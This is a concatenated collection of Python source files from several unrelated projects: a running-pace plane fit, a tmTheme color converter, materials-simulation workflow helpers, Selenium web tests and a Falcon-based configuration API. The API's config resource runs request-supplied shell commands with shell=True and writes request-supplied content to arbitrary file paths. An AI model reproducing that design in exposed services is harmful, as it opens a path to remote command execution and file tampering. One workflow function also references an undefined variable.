tmp_A.append([self.day[i], self.distance[i], 1])
tmp_b.append(self.pace[i])
b = np.matrix(tmp_b).T
A = np.matrix(tmp_A)
self.fit = (A.T * A).I * A.T *b
errors = b - A * self.fit
residual = np.linalg.norm(errors)
print("solution:")
print(" %f x + %f y + %f = z" %(self.fit[0], self.fit[1], self.fit[2]))
# print("errors:")
# print(" ", errors)
print("residual:")
print(" ", residual)
def plot(self):
fig = plt.figure()
ax = plt.subplot(111, projection = '3d')
ax.scatter(self.day, self.distance, self.pace, color = 'b')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
X, Y = np.meshgrid(np.arange(xlim[0], xlim[1]), \
np.arange(ylim[0], ylim[1]))
Z = np.zeros(X.shape)
for r in range(X.shape[0]):
for c in range(X.shape[1]):
Z[r,c] = self.fit[0] * X[r,c] + self.fit[1] * Y[r,c] + self.fit[2]
ax.plot_wireframe(X, Y, Z, color = 'y')
ax.set_xlabel('Days since ' + \
self.inputEvents[len(self.inputEvents)-1].timeStamp.strftime("%m-%d-%Y"))
ax.set_ylabel('Distance - miles')
ax.set_zlabel('Pace - min/mile')
plt.show()
# Remove commas embedded in quoted strings. Remove quotes from strings.
# Return the modified string.
def removeQuotesAndCommas(self, inputText):
inQuotes = False
outputText = ''
for c in inputText:
if inQuotes:
if c == '"':
inQuotes = False
elif c != ',':
outputText += c
else:
if c == '"':
inQuotes = True
else:
outputText += c
return outputText
#============================================================================
# Functions
def displayVersion():
print("runsPlot version " + str(version))
quit()
#============================================================================
# Main program
parser = argparse.ArgumentParser(description = \
"Plot pace vs time and length of run")
parser.add_argument('inputFile', type = str, help = 'Input file path')
parser.add_argument('-v', '--version', action = 'store_true', \
help = 'Display version and quit')
args = parser.parse_args()
if args.version:
displayVersion()
runs = Runs()
runs.load(args.inputFile)
print("Total number of runs = ", runs.length())
runs.fitPlane()
runs.plot()
``` |
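`Runs.fitPlane()` above solves the normal equations `(A^T A)^-1 A^T b` for the plane `pace = a*day + b*distance + c`. The self-contained sketch below reproduces the same fit on made-up sample points using `numpy.linalg.lstsq`, which is numerically preferable to forming the matrix inverse explicitly; all data values are purely illustrative.
```python
import numpy as np

# Illustrative sample points: x = day number, y = distance (miles), z = pace (min/mile).
x = np.array([0.0, 30.0, 60.0, 90.0, 120.0])
y = np.array([3.0, 5.0, 6.5, 10.0, 13.1])
z = np.array([10.2, 9.8, 9.9, 10.5, 10.9])

# Same model as fitPlane(): z = a*x + b*y + c, solved by least squares.
A = np.column_stack([x, y, np.ones_like(x)])
(a, b, c), residuals, rank, _ = np.linalg.lstsq(A, z, rcond=None)
print(f"pace = {a:.4f}*day + {b:.4f}*distance + {c:.4f}")
```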
{
"source": "jibsen/tmcolorconv",
"score": 2
} |
#### File: jibsen/tmcolorconv/tmcolorconv.py
```python
import argparse
import collections
import math
import operator
import plistlib
import re
# Generated using mkconvmatrix.py
GenericRGBtosRGB = [[1.0252482, -0.0265428, 0.0012946],
[0.0193970, 0.9480316, 0.0325714],
[-0.0017702, -0.0014426, 1.0032128]]
def mat_vec_mul(M, v):
"""Multiply matrix by vector."""
return [sum(map(operator.mul, r, v)) for r in M]
def str_to_color(s):
"""Convert hex string to color value."""
if len(s) == 3:
s = ''.join(c + c for c in s)
values = bytes.fromhex(s)
# Scale from [0-255] to [0-1]
return [c / 255.0 for c in values]
def color_to_str(C):
"""Convert color value to hex string."""
# Scale from [0-1] to [0-255]
V = [int(round(c * 255)) for c in C]
# Clamp values to [0-255]
for i in range(len(V)):
V[i] = max(min(V[i], 255), 0)
return '#{:02X}{:02X}{:02X}'.format(V[0], V[1], V[2])
def alpha_blend(color, base, alpha):
"""Blend color and base based on alpha."""
return [c * alpha + b * (1 - alpha) for c, b in zip(color, base)]
def sRGB_compand(c):
if c <= 0.0031308:
return 12.92 * c
else:
return 1.055 * math.pow(c, 1 / 2.4) - 0.055
def convert_color(Vin, gamma):
"""Convert color Vin from Generic RGB to sRGB."""
# Linearize
v = [math.pow(c, gamma) for c in Vin]
v_srgb = mat_vec_mul(GenericRGBtosRGB, v)
# sRGB companding
Vout = list(map(sRGB_compand, v_srgb))
return Vout
def convert_scheme(scheme, gamma, blend_alpha):
"""Convert colors in scheme from Generic RGB to sRGB.
Args:
scheme: tmTheme loaded through plistlib.
gamma (float): Gamma value of colors.
blend_alpha (bool): If True, colors with alpha are blended, otherwise
the alpha value is copied.
Returns:
Converted scheme.
"""
bg = [0, 0, 0]
fg = [0, 0, 0]
if gamma == 2.2:
gamma = 563 / 256.0
elif gamma == 1.8:
gamma = 461 / 256.0
for idx, entry in enumerate(scheme['settings']):
for k, v in entry['settings'].items():
# Match 6 digit hex color with optional alpha
match = re.match('#([0-9a-fA-F]{6})([0-9a-fA-F]{2})?', v)
# Match 3 digit hex color
if not match:
match = re.match('#([0-9a-fA-F]{3})', v)
if match:
color = str_to_color(match.group(1))
alpha_str = match.group(2)
# Blend alpha if present
if blend_alpha and alpha_str:
alpha = int(alpha_str, 16) / 255.0
alpha_str = None
if k in ('background', 'lineHighlight', 'selection'):
color = alpha_blend(color, bg, alpha)
else:
color = alpha_blend(color, fg, alpha)
# Update fg and bg if in editor settings
if idx == 0:
if k == 'foreground':
fg = color
elif k == 'background':
bg = color
# Update hex color in scheme
color_str = color_to_str(convert_color(color, gamma))
color_str += alpha_str or ''
scheme['settings'][idx]['settings'][k] = color_str
return scheme
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert Generic RGB to sRGB.')
parser.add_argument('infile', type=argparse.FileType('rb'),
help='input tmTheme file')
parser.add_argument('outfile', type=argparse.FileType('wb'),
help='output tmTheme file')
parser.add_argument('-g', '--gamma', type=float, default=1.8,
help='input gamma (default 1.8)')
parser.add_argument('-b', action='store_true',
help='blend alpha')
args = parser.parse_args()
scheme = plistlib.load(args.infile, dict_type=collections.OrderedDict)
if scheme.get('colorSpaceName') == 'sRGB':
print('Warning: colorSpaceName key is already sRGB')
else:
scheme['colorSpaceName'] = 'sRGB'
convert_scheme(scheme, args.gamma, args.b)
plistlib.dump(scheme, args.outfile, sort_keys=False)
``` |
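The script is normally run from the command line, for example `python tmcolorconv.py Monokai.tmTheme Monokai-sRGB.tmTheme -g 1.8` (file names are examples). The functions can also be used directly; the sketch below converts a single hex color with the same 1.8-gamma encoding that `convert_scheme()` uses, assuming this file is importable as a module.
```python
from tmcolorconv import color_to_str, convert_color, str_to_color

generic_rgb = str_to_color('272822')            # example Generic RGB color
srgb = convert_color(generic_rgb, 461 / 256.0)  # the exact gamma convert_scheme() uses for "1.8"
print(color_to_str(srgb))
```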
{
"source": "jic198/mpmorph",
"score": 3
} |
#### File: mpmorph/fireworks/powerups.py
```python
from mpmorph.firetasks.dbtasks import VaspMDToDb, TrajectoryDBTask
from mpmorph.firetasks.glue_tasks import PreviousStructureTask, SaveStructureTask, \
PassPVTask
from mpmorph.firetasks.mdtasks import RescaleVolumeTask, ConvergeTask, PVRescaleTask, \
DiffusionTask
__author__ = '<NAME> and <NAME>'
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def add_diffusion_task(fw, **kwargs):
spawner_task = DiffusionTask(**kwargs)
fw.tasks.append(spawner_task)
return fw
def add_converge_task(fw, **kwargs):
"""
This powerup adds the convergence task onto a MD firework, which turns a workflow into a dynamic workflow.
This firetask will check to ensure the specified parameters (Usually pressure and Energy) are converged within the
specified thresholds.
:param fw:
:param kwargs:
:return:
"""
spawner_task = ConvergeTask(**kwargs)
fw.tasks.append(spawner_task)
return fw
def aggregate_trajectory(fw, **kwargs):
"""
This firetask will add a task which converts a series of MD runs into a trajectory object
:param fw:
:param kwargs:
:return:
"""
fw.tasks.append(TrajectoryDBTask(**kwargs))
return fw
def add_cont_structure(fw):
prev_struct_task = PreviousStructureTask()
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, prev_struct_task)
return fw
def add_pass_structure(fw, **kwargs):
save_struct_task = SaveStructureTask(**kwargs)
fw.tasks.append(save_struct_task)
return fw
def add_pass_pv(fw, **kwargs):
pass_pv_task = PassPVTask(**kwargs)
fw.tasks.append(pass_pv_task)
return fw
def add_pv_volume_rescale(fw):
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, PVRescaleTask())
return fw
def add_rescale_volume(fw, **kwargs):
rsv_task = RescaleVolumeTask(**kwargs)
insert_i = 2
for (i, task) in enumerate(fw.tasks):
if task.fw_name == "{{atomate.vasp.firetasks.run_calc.RunVaspCustodian}}":
insert_i = i
break
fw.tasks.insert(insert_i, rsv_task)
return fw
def replace_pass_structure(fw, **kwargs):
# look for rescale_volume task
replaced = False
fw_dict = fw.to_dict()
for i in range(len(fw_dict['spec']['_tasks'])):
if fw_dict['spec']['_tasks'][i]["_fw_name"] == '{{mpmorph.firetasks.glue_tasks.SaveStructureTask}}':
del fw_dict['spec']['_tasks'][i]["_fw_name"]
fw.tasks[i] = SaveStructureTask(**kwargs)
replaced = True
break
# TODO: Replace with real error handling
if replaced == False:
print("error, no SaveStructureTask to replace")
return
return fw
def replace_vaspmdtodb(fw):
# look for vaspdb task
replaced = False
fw_dict = fw.to_dict()
for i in range(len(fw_dict['spec']['_tasks'])):
if fw_dict['spec']['_tasks'][i]["_fw_name"] == '{{atomate.vasp.firetasks.parse_outputs.VaspToDb}}':
del fw_dict['spec']['_tasks'][i]["_fw_name"]
fw.tasks[i] = VaspMDToDb(**fw_dict['spec']['_tasks'][i])
replaced = True
break
# TODO: Replace with real error handling
if replaced == False:
print("error, no vasptodb to replace")
return
return fw
```
#### File: mpmorph/workflows/quench.py
```python
import numpy as np
from atomate.vasp.fireworks.core import OptimizeFW
from fireworks import Workflow
from mpmorph.fireworks import powerups
from mpmorph.fireworks.core import StaticFW, MDFW
from mpmorph.util import recursive_update
__author__ = '<NAME> and <NAME>'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
def get_quench_wf(structures, temperatures={}, priority=None, quench_type="slow_quench", cool_args={}, hold_args={},
quench_args={},
descriptor="", **kwargs):
fw_list = []
temp = {"start_temp": 3000, "end_temp": 500, "temp_step": 500} if temp is None else temp
cool_args = {"md_params": {"nsteps": 200}} if cool_args is None else cool_args
hold_args = {"md_params": {"nsteps": 500}} if hold_args is None else hold_args
quench_args = {} if quench_args is None else quench_args
for (i, structure) in enumerate(structures):
_fw_list = []
if quench_type == "slow_quench":
            for t in np.arange(temperatures["start_temp"], temperatures["end_temp"], -temperatures["temp_step"]):
                # get fw for cool step
                use_prev_structure = False
                if len(_fw_list) > 0:
                    use_prev_structure = True
                _fw = get_MDFW(structure, t, t - temperatures["temp_step"],
                               name="snap_" + str(i) + "_cool_" + str(t - temperatures["temp_step"]),
                               args=cool_args, parents=[_fw_list[-1]] if len(_fw_list) > 0 else [],
                               priority=priority, previous_structure=use_prev_structure,
                               insert_db=True, **kwargs)
                _fw_list.append(_fw)
                # get fw for hold step
                _fw = get_MDFW(structure, t - temperatures["temp_step"], t - temperatures["temp_step"],
                               name="snap_" + str(i) + "_hold_" + str(t - temperatures["temp_step"]),
                               args=hold_args, parents=[_fw_list[-1]], priority=priority,
                               previous_structure=True, insert_db=True, **kwargs)
                _fw_list.append(_fw)
if quench_type in ["slow_quench", "mp_quench"]:
# Relax OptimizeFW and StaticFW
run_args = {"run_specs": {"vasp_input_set": None, "vasp_cmd": ">>vasp_cmd<<",
"db_file": ">>db_file<<",
"spec": {"_priority": priority}
},
"optional_fw_params": {"override_default_vasp_params": {}}
}
run_args = recursive_update(run_args, quench_args)
_name = "snap_" + str(i)
fw1 = OptimizeFW(structure=structure, name=_name + descriptor + "_optimize",
parents=[_fw_list[-1]] if len(_fw_list) > 0 else [],
**run_args["run_specs"], **run_args["optional_fw_params"],
max_force_threshold=None)
if len(_fw_list) > 0:
fw1 = powerups.add_cont_structure(fw1)
fw1 = powerups.add_pass_structure(fw1)
fw2 = StaticFW(structure=structure, name=_name + descriptor + "_static",
parents=[fw1], **run_args["run_specs"],
**run_args["optional_fw_params"])
fw2 = powerups.add_cont_structure(fw2)
fw2 = powerups.add_pass_structure(fw2)
_fw_list.extend([fw1, fw2])
fw_list.extend(_fw_list)
name = structure.composition.reduced_formula + descriptor + "_quench"
wf = Workflow(fw_list, name=name)
return wf
def get_MDFW(structure, start_temp, end_temp, name="molecular dynamics", priority=None, job_time=None, args={},
**kwargs):
run_args = {"md_params": {"nsteps": 500},
"run_specs": {"vasp_input_set": None, "vasp_cmd": ">>vasp_cmd<<", "db_file": ">>db_file<<",
"wall_time": 40000},
"optional_fw_params": {"override_default_vasp_params": {}, "spec": {}}}
run_args["optional_fw_params"]["override_default_vasp_params"].update(
{'user_incar_settings': {'ISIF': 1, 'LWAVE': False, 'PREC': 'Low'}})
run_args = recursive_update(run_args, args)
_mdfw = MDFW(structure=structure, name=name, **run_args["md_params"],
**run_args["run_specs"], **run_args["optional_fw_params"], **kwargs)
return _mdfw
``` |
{
"source": "jicaiyunshang/jicaiauto",
"score": 2
} |
#### File: test/WebTest/test_Jicai_WebUI.py
```python
__author__ = 'Tser'
__email__ = '<EMAIL>'
__project__ = 'jicaiauto'
__script__ = 'testJicai.py'
__create_time__ = '2020/7/15 23:34'
from jicaiauto.jicaiauto import web_action
from jicaiauto.utils.jicaiautoEmail import send_email
from jicaiauto.data.GLO_VARS import PUBLIC_VARS
from jicaiauto.config.config import EMAILCONFIG
from os import path
from time import sleep
import pytest
emil = {
'sender' : '<EMAIL>',
'receiver' : '<EMAIL>',
'smtpserver': 'smtp.163.com',
'smtp_port' : 25,
'username' : 'username',
'password' : 'password',
    'subject'   : 'Jicai Yunshang automated test report',
'report' : 'report.html'
}
PUBLIC_VARS.update(emil)
@pytest.mark.jicai_web
def test_manzhai_Case1(browser):
web_action(browser, cmd='打开', loc='', data='http://www.baidu.com')
web_action(browser, '输入', '//*[@id="kw"]', '小白科技')
web_action(browser, '点击', '//*[@id="su"]')
web_action(browser, '停止时间', data=3)
web_action(browser, '标题', contains_assert='小白')
@pytest.mark.jicai_web
def test_manzhai_Case2(browser):
web_action(browser, cmd='打开', loc='', data='https://www.baidu.com')
web_action(browser, '输入', '//*[@id="kw"]', '吉彩云尚')
web_action(browser, '点击', '//*[@id="su"]')
web_action(browser, '停止时间', data=3)
web_action(browser, '标题', contains_assert='吉彩-')
web_action(browser, '关闭')
@pytest.mark.last
def test_last():
    ''' The test run has finished; send the report email. '''
    print('Testing finished, sending the report email')
sleep(5)
_emil = EMAILCONFIG()
_cur_path = path.abspath(path.curdir)
print(PUBLIC_VARS)
print(_emil)
if 'report' in PUBLIC_VARS.keys() and '' != PUBLIC_VARS['report']:
if path.isfile(_cur_path + '/' + PUBLIC_VARS['report']):
send_email(_cur_path + '/' + PUBLIC_VARS['report'])
elif '' != _emil.report:
if path.isfile(_cur_path + '/' + _emil.report):
send_email(_cur_path + '/' + _emil.report)
@pytest.mark.run(order=1)
def test_first():
    print('Testing started')
```
#### File: jicaiauto/utils/jicaiautodb.py
```python
__author__ = 'Tser'
__email__ = '<EMAIL>'
__project__ = 'jicaiauto'
__script__ = 'init_db.py'
__create_time__ = '2020/7/2 21:45'
from sqlite3 import connect
from jicaiauto.config.config import DBCONFIG
class DB(object):
def __init__(self):
self.conn = connect(DBCONFIG().dbpath)
self.cur = self.conn.cursor()
def select(self, sql=None, parames=None, *args, **kwargs):
return self.cur.execute(sql).fetchall()
def update(self, sql=None, parames=None, *args, **kwargs):
self.cur.execute(sql)
self.conn.commit()
def __del__(self):
self.cur.close()
self.conn.close()
``` |
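A minimal usage sketch of the `DB` helper above; it assumes the `jicaiauto` package is installed and that `DBCONFIG().dbpath` points at a valid SQLite file. The query shown simply lists the tables, since the actual schema is not defined here.
```python
from jicaiauto.utils.jicaiautodb import DB

db = DB()
tables = db.select("SELECT name FROM sqlite_master WHERE type='table'")
print(tables)
```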
{
"source": "jicarretero/lcp",
"score": 3
} |
#### File: lcp/api/error_handler.py
```python
from falcon.errors import HTTPBadRequest as HTTP_Bad_Request
from falcon.errors import HTTPInternalServerError as HTTP_Internal_Server_Error
from falcon.errors import HTTPUnsupportedMediaType as HTTP_Unsupported_Media_Type
from lib.response import Bad_Request_Response, Internal_Server_Error_Response, Unsupported_Media_Type_Response
class Base_Handler(object):
@classmethod
def handler(cls, req, resp, ex, params):
cls.response(exception=ex).apply(resp)
resp.complete = True
@classmethod
def get(cls):
return cls.error, cls.handler
class Bad_Request_Handler(Base_Handler):
error = HTTP_Bad_Request
response = Bad_Request_Response
class Internal_Server_Error_Handler(Base_Handler):
error = HTTP_Internal_Server_Error
response = Internal_Server_Error_Response
class Unsupported_Media_Type_Handler(Base_Handler):
error = HTTP_Unsupported_Media_Type
response = Unsupported_Media_Type_Response
```
#### File: lcp/api/middleware.py
```python
class Negotiation_Middleware(object):
def process_request(self, req, resp):
resp.content_type = req.content_type
```
#### File: lcp/extra/extra_utils.py
```python
from urllib.parse import urlparse
HTTP_SCHEME = "http"
HTTPS_SCHEME = "https"
class UrlSchemaData:
def __init__(self, url):
r = urlparse(url)
self.scheme = r.scheme
self.netloc = r.netloc
self.port = 0
self.host = ""
self.https = False
self.get_port()
def get_port(self):
try:
self.host, port = self.netloc.split(":", 1)
self.port = int(port)
except ValueError:
self.host = self.netloc
if self.scheme == HTTPS_SCHEME:
self.port = 443
else:
self.port = 80
if self.scheme == HTTPS_SCHEME:
self.https = True
```
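A quick illustration of the port and scheme defaulting implemented by `UrlSchemaData`; the URLs are examples only, and the import assumes the repository's `extra` package is on the path.
```python
from extra.extra_utils import UrlSchemaData

for url in ('http://example.com', 'https://example.com', 'http://example.com:8080/api'):
    u = UrlSchemaData(url)
    print(u.host, u.port, u.https)
# Expected: ('example.com', 80, False), ('example.com', 443, True), ('example.com', 8080, False)
```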
#### File: lcp/resource/config.py
```python
import subprocess as sp
import time
from os.path import expanduser as expand_user
from resource.base import Base_Resource
from docstring import docstring
from lib.http import HTTP_Method
from lib.parser import json_parser, property_parser, xml_parser, yaml_parser
from lib.response import Bad_Request_Response, Base_Response, Content_Response, No_Content_Response, Not_Found_Response
from schema.config import (Config_Action_Response_Schema, Config_Parameter_Response_Schema, Config_Request_Schema,
Config_Resource_Response_Schema)
from utils.datetime import datetime_to_str
from utils.exception import extract_info
from utils.json import loads
from utils.sequence import is_list, wrap
File_Not_Found_Error = FileNotFoundError
class Config_Resource(Base_Resource):
tag = {'name': 'config', 'description': 'Configuration at run-time.'}
routes = '/config',
parsers = {'json': json_parser, 'properties': property_parser, 'xml': xml_parser, 'yaml': yaml_parser}
@docstring(source='config/post.yaml')
def on_post(self, req, resp):
req_data = req.media or {}
resp_data, valid = Config_Request_Schema(many=is_list(req_data),
method=HTTP_Method.POST).validate(data=req_data)
if valid:
req_data_wrap = wrap(req_data)
if len(req_data_wrap) > 0:
for config in req_data_wrap:
for cfg, cfg_list in config.items():
for data in wrap(cfg_list):
output = {}
if cfg == 'actions':
output = self.__actions(data)
schema = Config_Action_Response_Schema
elif cfg == 'parameters':
output = self.__parameters(data)
schema = Config_Parameter_Response_Schema
elif cfg == 'resources':
output = self.__resources(data)
schema = Config_Resource_Response_Schema
if isinstance(output, Base_Response):
output.add(resp)
else:
output_data = data.copy()
id = output_data.pop('id', None)
output.update(id=id, data=output_data, timestamp=datetime_to_str())
resp_data, valid = schema(many=False, method=HTTP_Method.POST,
unknown='INCLUDE').validate(data=output)
if valid:
Content_Response(output).add(resp)
else:
resp_data.add(resp)
else:
msg = 'No content to apply configurations with the {{request}}'
No_Content_Response(msg, request=req_data).apply(resp)
else:
resp_data.apply(resp)
def __actions(self, data):
cmd = data.get('cmd', None)
daemon = data.get('daemon', False)
output_format = data.get('output_format', 'plain')
output = {'type': 'action'}
run = ' '.join([cmd] + wrap(data.get('args', [])))
start = time.time()
proc = self.__run_cmd(cmd=run, daemon=daemon, output=output)
if daemon:
output.update(error=False, return_code=0)
else:
output.update(error=proc.returncode != 0,
return_code=proc.returncode, duration=time.time() - start)
self.__set_std(proc.stdout, output, 'stdout', output_format)
self.__set_std(proc.stderr, output, 'stderr', output_format)
return output
def __parameters(self, data):
schema = data.get('schema', None)
source = data.get('source', None)
path = wrap(data.get('path', []))
value = data.get('value', None)
output = {'type': 'parameter'}
try:
source = expand_user(source)
output.update(self.parsers.get(schema)(schema, source, path, value))
return output
except File_Not_Found_Error as e:
msg = f'Source {source} not found'
self.log.exception(msg, e)
return Not_Found_Response(msg, e, type='parameter', data=data)
except Exception as e:
msg = f'Source {source} not accessible'
self.log.exception(msg, e)
return Bad_Request_Response(e, message=msg, type='parameter', data=data)
def __resources(self, data):
path = data.get('path', None)
content = data.get('content', None)
output = {'type': 'resource'}
try:
fix_path = expand_user(path)
with open(fix_path, "w") as file:
file.write(content)
output.update(path=path, content=content)
return output
except FileNotFoundError as e:
msg = f'Path {path} not found'
self.log.exception(msg, e)
return Not_Found_Response(msg, e, type='resource', data=data)
except Exception as e:
msg = f'Path {path} not accessible'
self.log.exception(msg, e)
return Bad_Request_Response(e, message=msg, type='resource', data=data)
def __set_std(self, data, output, key, output_format):
if data:
data = data.strip()
if output_format == 'plain':
output[key] = data
elif output_format == 'lines':
output[key] = data.splitlines()
else:
try:
output[key] = loads(data)
except Exception as e:
msg = f'Not valid JSON for {key}'
self.log.exception(msg, e)
output.update(description=msg, exception=extract_info(e))
output[key] = data
def __run_cmd(self, cmd, daemon, output):
if not daemon:
return sp.run(cmd, check=False, shell=True,
stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)
else:
return sp.Popen(cmd, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, start_new_session=True)
```
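For clarity, here is a hedged example of the kind of request body that `Config_Resource.on_post()` accepts, combining the three supported sections; every id, path, and value below is illustrative rather than taken from a real deployment.
```python
# Illustrative POST /config payload for the LCP Config_Resource above.
example_request = {
    'actions': [
        {'id': 'list-tmp', 'cmd': 'ls', 'args': ['-la', '/tmp'], 'daemon': False, 'output_format': 'lines'}
    ],
    'parameters': [
        {'id': 'port', 'schema': 'yaml', 'source': '~/service.yaml', 'path': ['server', 'port'], 'value': 8080}
    ],
    'resources': [
        {'id': 'motd', 'path': '~/motd.txt', 'content': 'hello from LCP'}
    ]
}
```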
#### File: lcp/resource/security_functions.py
```python
from schema.security_functions import Agent as AgentSchema
from schema.security_functions import AgentType
from docstring import docstring
from resource.base import Base_Resource
import json
from marshmallow.exceptions import ValidationError
from falcon import HTTP_CREATED, HTTP_NOT_ACCEPTABLE, HTTP_NOT_FOUND, HTTP_PRECONDITION_FAILED
from extra.lcp_config import LCPConfig
from extra.controller import LCPController
class SecurityFunction(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/instance',
def __init__(self):
pass
@docstring(source='Agents/GetAgentInstanceResource.yml')
def on_get(self, req, resp):
# resp_data, valid = SecurityFunctionSchema(method=HTTP_Method.GET) \
# .validate(data={})
resp.body = json.dumps(LCPConfig().agents)
@docstring(source='Agents/PostAgentInstanceResource.yml')
def on_post(self, req, resp):
# resp_data, valid = AgentSchema(method=HTTP_Method.POST) \
# .validate(data={})
payload = req.media if isinstance(req.media, list) else [req.media]
try:
ag_schema = AgentSchema(many=True)
ag_schema.load(payload)
controller = LCPController()
for e in payload:
try:
controller.set_agent_instance(e)
except KeyError:
resp.body = '{"error": "agent_type "' + e['type'] + ' not found"}'
resp.status = HTTP_NOT_FOUND
return
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
resp.status = HTTP_NOT_ACCEPTABLE
class SecurityFunctionbyId(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/instance/{id}',
def __init__(self):
pass
@docstring(source='Agents/PutAgentInstanceResource.yml')
def on_put(self, req, resp, id):
resp.status = HTTP_NOT_FOUND
@docstring(source='Agents/DeleteAgentInstanceResource.yml')
def on_delete(self, req, resp, id):
resp.status = HTTP_NOT_FOUND
class AgentTypeResource(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/type',
@docstring(source="Agents/GetAgentTypeResource.yml")
def on_get(self, req, resp):
resp.body = json.dumps(LCPConfig().agent_types)
@docstring(source="Agents/PostAgentTypeResource.yml")
def on_post(self, req, resp):
payload = req.media if isinstance(req.media, list) else [req.media]
controller = LCPController()
try:
at_schema = AgentType(many=True)
d = at_schema.validate(payload)
if d[1] == False:
raise ValidationError("Not acceptable")
for e in payload:
controller.set_agent_type(e)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
resp.status = HTTP_NOT_ACCEPTABLE
class AgentTypeResourcebyId(Base_Resource):
tag = {'name': 'Agents',
'description': 'Describes the Agent types and Agent instances.'}
routes = '/agent/type/{id}',
def __init__(self):
pass
@docstring(source="Agents/PutAgentTypeResource.yml")
def on_put(self, req, resp, id):
resp.status = HTTP_NOT_FOUND
@docstring(source="Agents/DeleteAgentTypeResource.yml")
def on_delete(self, req, resp, id):
resp.status = HTTP_NOT_FOUND
```
#### File: lcp/resource/self_data.py
```python
from extra.lcp_config import LCPConfig
from docstring import docstring
from resource.base import Base_Resource
from schema.hardware_definitions import BaremetalServer as BaremetalServerSchema
from schema.hardware_definitions import ExecutionEnvironment
from lib.http import HTTP_Method
from falcon import HTTP_NOT_ACCEPTABLE, HTTP_CREATED, HTTP_NOT_FOUND, HTTP_INTERNAL_SERVER_ERROR
from marshmallow import ValidationError
from schema.lcp_schemas import LCPDescription
import json
from extra.hw_helpers.host_info import HostInfoToLcpHelper
from extra.controller import LCPController
class DescribeDeployment(Base_Resource):
tag = {'name': 'self',
'description': 'This method does the initial configuration'}
routes = '/self/deployment',
@docstring(source="self/self_deployment.yaml")
def on_get(self, req, resp):
lcp_config = LCPConfig()
r = {"executionType": lcp_config.exec_env_type, "environment": lcp_config.deployment}
resp.body = json.dumps(r)
@docstring(source="self/post_self_deployment.yaml")
def on_post(self, req, resp):
resp_Data, valid = ExecutionEnvironment(method=HTTP_Method.GET) \
.validate(req.media)
payload = req.media
try:
cfg = LCPConfig()
ee_schema = ExecutionEnvironment(many=False)
ee_schema.load(payload)
cfg.setDeployment(payload)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
resp.status = HTTP_NOT_ACCEPTABLE
class DescribeSelf(Base_Resource):
data = {}
tag = {'name': 'self',
'description': 'Returns description of self LCP.'}
routes = '/self',
@docstring(source="self/get.yaml")
def on_get(self, req, resp):
# TODO: Organise this code properly, using the appropriate schema!
resp_Data, valid = BaremetalServerSchema(method=HTTP_Method.GET) \
.validate(data={})
lcp = json.dumps(LCPConfig().lcp)
if lcp == "null":
resp.body = None
resp.status = HTTP_NOT_FOUND
else:
resp.body = lcp
payload = req.media if isinstance(req.media, list) else [req.media]
class InitialSelfConfiguration(Base_Resource):
data = {}
tag = {'name': 'self',
'description': 'Initial configuration for the LCP'}
routes = '/self/configuration',
@docstring(source="self/post.yaml")
def on_post(self, req, resp):
resp_Data, valid = LCPDescription(method=HTTP_Method.POST) \
.validate(data={})
payload = req.media
try:
controller = LCPController()
ic_schema = LCPDescription(many=False)
ic_schema.load(payload)
res = controller.set_self_initial_configuration(payload)
resp.status = HTTP_CREATED
except ValidationError as e:
resp.body = json.dumps(e.messages)
resp.status = HTTP_NOT_ACCEPTABLE
```
#### File: lcp/test/cloud_infrastructure_test.py
```python
from falcon import testing
from api import api
from reader.arg import Arg_Reader
from about import project, title, version
import os
import json
from schema.cloudschema import CloudSchema
from resource.cloud_resource import CloudInfrastructure
from resource.software_definition import SoftwareDefinition as SoftwareDefinitionResource
from marshmallow.exceptions import ValidationError
from test_utils import *
from test.testbase import LCPTestBase
class TestMyApp(LCPTestBase):
def _getSecurityFucntionExample(self):
json_file = os.path.dirname(__file__) + \
"/examples/security-function-example.json"
with open(json_file) as f:
file_data = f.read()
return json.loads(file_data)
def test_cloud_infrastructure(self):
cl_dict = loadExampleFile("cloud-infrastructure-example.json")
cloud_schema = CloudSchema(many=False)
try:
d = cloud_schema.load(cl_dict)
assert True
except ValidationError as ve:
print(ve)
assert False
def test_get_cloud_infrastructure(self):
cl_dict = loadExampleFile("cloud-infrastructure-example.json")
headers = getAuthorizationHeaders()
CloudInfrastructure.data = []
result = self.simulate_get("/cloud", headers=headers)
assert (result.status == "200 OK")
body = result.json
assert (type(body) is list)
assert len(body) == 0
CloudInfrastructure.data.append(cl_dict)
result = self.simulate_get("/cloud", headers=headers)
assert result.status == "200 OK"
body = result.json
assert type(body) is list
assert len(body) == 1
try:
cloud_schema = CloudSchema(many=True)
cloud_schema.load(body)
assert True
except ValidationError as ve:
print(ve)
assert False
```
#### File: lcp/test/testbase.py
```python
from utils.log import Log
from falcon import testing
from api import api
from reader.arg import Arg_Reader
from about import title, version
from extra.lcp_config import LCPConfig
from extra.clients_starter import end_client_threads
class LCPTestBase(testing.TestCase):
log = None
def setUp(self):
super(LCPTestBase, self).setUp()
LCPConfig.__drop_it__("examples/LCPConfig.yaml")
lcp = LCPConfig()
lcp.reset()
lcp.testing = True
self.db = Arg_Reader.read()
if LCPTestBase.log is None:
Log.init(config="../"+self.db.log_config)
LCPTestBase.log = Log.get('api')
self.app = api(title=title, version=version)
def tearDown(self) -> None:
end_client_threads()
```
#### File: lcp/utils/json.py
```python
import json
from datetime import datetime
def __converter(obj):
if isinstance(obj, datetime):
return obj.__str__()
def dumps(data, *args, **kwargs):
return json.dumps(data, *args, default=__converter, **kwargs)
